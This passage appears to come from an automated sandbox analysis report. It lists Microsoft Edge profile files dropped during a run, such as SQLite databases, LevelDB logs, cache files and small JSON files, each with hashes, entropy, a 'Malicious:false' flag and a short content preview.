                                                                                                                                                                                                                                                                                          Preview:SNSS.........d].............d]......"..d].............d].........d].........d].........d]....!....d].................................d]..d]1..,.....d]$...620ffd09_4a33_4e77_8cb7_e0ea7bc70168.....d].........d]......8..........d].....d].........................d]....................5..0.....d]&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......d].........d].........................d].............d]........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x............*.......*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8...............................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):352
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.131382700138106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5FVq2P923oH+Tcwt7Uh2ghZIFUt8MhSgZmw+M/IkwO923oH+Tcwt7Uh2gnLJ:XVv4YebIhHh2FUt8zg/+II5LYebIhHLJ
                                                                                                                                                                                                                                                                                          MD5:6C6FC9EBAFC4D2DE87311DF796A6986E
                                                                                                                                                                                                                                                                                          SHA1:C03EC1938D2B4E8AEB013B405D8D5B7B8BFC5B54
                                                                                                                                                                                                                                                                                          SHA-256:661A8621E3F1B998FE9855304350F6A52FBE6684E202A6C66BC4919C99187304
                                                                                                                                                                                                                                                                                          SHA-512:22925955F1AEE84396BC5B8D77341027B120B583F156AC1310AB32BA6148569815D2D455F337CDA24473636A7EA11B29E7C7CAABE0174A2E1298EA31A82CE38D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.334 12e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/31-10:59:17.335 12e0 Recovering log #3.2024/12/31-10:59:17.336 12e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):352
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.131382700138106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5FVq2P923oH+Tcwt7Uh2ghZIFUt8MhSgZmw+M/IkwO923oH+Tcwt7Uh2gnLJ:XVv4YebIhHh2FUt8zg/+II5LYebIhHLJ
                                                                                                                                                                                                                                                                                          MD5:6C6FC9EBAFC4D2DE87311DF796A6986E
                                                                                                                                                                                                                                                                                          SHA1:C03EC1938D2B4E8AEB013B405D8D5B7B8BFC5B54
                                                                                                                                                                                                                                                                                          SHA-256:661A8621E3F1B998FE9855304350F6A52FBE6684E202A6C66BC4919C99187304
                                                                                                                                                                                                                                                                                          SHA-512:22925955F1AEE84396BC5B8D77341027B120B583F156AC1310AB32BA6148569815D2D455F337CDA24473636A7EA11B29E7C7CAABE0174A2E1298EA31A82CE38D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.334 12e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/31-10:59:17.335 12e0 Recovering log #3.2024/12/31-10:59:17.336 12e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):431
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.272477615594186
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5j03+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8M8Zmw+M2AVkwO923oH+TcwtzjqEE:fv4YebvqBQFUt8j/+A5LYebvqBvJ
                                                                                                                                                                                                                                                                                          MD5:DD4BBEA2E2A1732A9D4BA2E6B20CF38E
                                                                                                                                                                                                                                                                                          SHA1:399AAA71659EC37FEDE4F93ABD3AB3E55126420B
                                                                                                                                                                                                                                                                                          SHA-256:FAF1AD0514254A53A63D7C9D18DB922B1E1EBEF618FFC15ED1B06685365FA581
                                                                                                                                                                                                                                                                                          SHA-512:785EAEAFD230BE0CF55BA11BD45825BDE80A8E92044DB9445C4C7F88A3B6DA0F044E72A8FDA561479E3F7FF1076BACAE64EEB4A804AF79BF7B80B2687206CB5F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.959 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/31-10:59:17.960 3f8 Recovering log #3.2024/12/31-10:59:17.963 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):431
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.272477615594186
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5j03+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8M8Zmw+M2AVkwO923oH+TcwtzjqEE:fv4YebvqBQFUt8j/+A5LYebvqBvJ
                                                                                                                                                                                                                                                                                          MD5:DD4BBEA2E2A1732A9D4BA2E6B20CF38E
                                                                                                                                                                                                                                                                                          SHA1:399AAA71659EC37FEDE4F93ABD3AB3E55126420B
                                                                                                                                                                                                                                                                                          SHA-256:FAF1AD0514254A53A63D7C9D18DB922B1E1EBEF618FFC15ED1B06685365FA581
                                                                                                                                                                                                                                                                                          SHA-512:785EAEAFD230BE0CF55BA11BD45825BDE80A8E92044DB9445C4C7F88A3B6DA0F044E72A8FDA561479E3F7FF1076BACAE64EEB4A804AF79BF7B80B2687206CB5F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.959 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/31-10:59:17.960 3f8 Recovering log #3.2024/12/31-10:59:17.963 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\3a56a869-96a6-47dd-afd5-b9ba94b1c999.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\9de9b73f-9250-44e6-b488-f76d9553e11f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF4463d.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f67d164e-feb1-484f-a879-3ed753e8c04f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                          MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                          SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                          SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                          SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.261588805554528
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:57R+q2P923oH+TcwtzjqEKj0QMxIFUt8MvZmw+M9d3VkwO923oH+TcwtzjqEKj0b:1cv4YebvqBZFUt8A/+EdF5LYebvqBaJ
                                                                                                                                                                                                                                                                                          MD5:5B03EF01DE1EDDD01557C4E25B0C3F27
                                                                                                                                                                                                                                                                                          SHA1:941E91B013008E3047F6A19544869A9688D7B90E
                                                                                                                                                                                                                                                                                          SHA-256:C9E714A7900469283D94953DF34F5946EA8A716917F0A8F619EE34FE14A1521B
                                                                                                                                                                                                                                                                                          SHA-512:600C123D3BAE742D66946D96B69417217DCC57FEC8472721CED3F5943FB9B444D5B1186B61BB2608F0993DF98808BF11F00280AB600A067F0BA3231AF2D0B575
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:36.045 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/31-10:59:36.047 3f8 Recovering log #3.2024/12/31-10:59:36.050 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.261588805554528
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:57R+q2P923oH+TcwtzjqEKj0QMxIFUt8MvZmw+M9d3VkwO923oH+TcwtzjqEKj0b:1cv4YebvqBZFUt8A/+EdF5LYebvqBaJ
                                                                                                                                                                                                                                                                                          MD5:5B03EF01DE1EDDD01557C4E25B0C3F27
                                                                                                                                                                                                                                                                                          SHA1:941E91B013008E3047F6A19544869A9688D7B90E
                                                                                                                                                                                                                                                                                          SHA-256:C9E714A7900469283D94953DF34F5946EA8A716917F0A8F619EE34FE14A1521B
                                                                                                                                                                                                                                                                                          SHA-512:600C123D3BAE742D66946D96B69417217DCC57FEC8472721CED3F5943FB9B444D5B1186B61BB2608F0993DF98808BF11F00280AB600A067F0BA3231AF2D0B575
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:36.045 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/31-10:59:36.047 3f8 Recovering log #3.2024/12/31-10:59:36.050 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.21225022620582
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5vo1q2P923oH+TcwtpIFUt8Mm3JZmw+MBjkwO923oH+Tcwta/WLJ:5o1v4YebmFUt8zJ/+wj5LYebaUJ
                                                                                                                                                                                                                                                                                          MD5:BD90687DA4FE304D162BB4A6956BAA68
                                                                                                                                                                                                                                                                                          SHA1:DB6C7A4E5350D7508BA9A97811C2AB9681FF057B
                                                                                                                                                                                                                                                                                          SHA-256:418EAD597CBA26B4DB2A0B6E28A01650087D9C244C719B0B521AA14D1F4CF11D
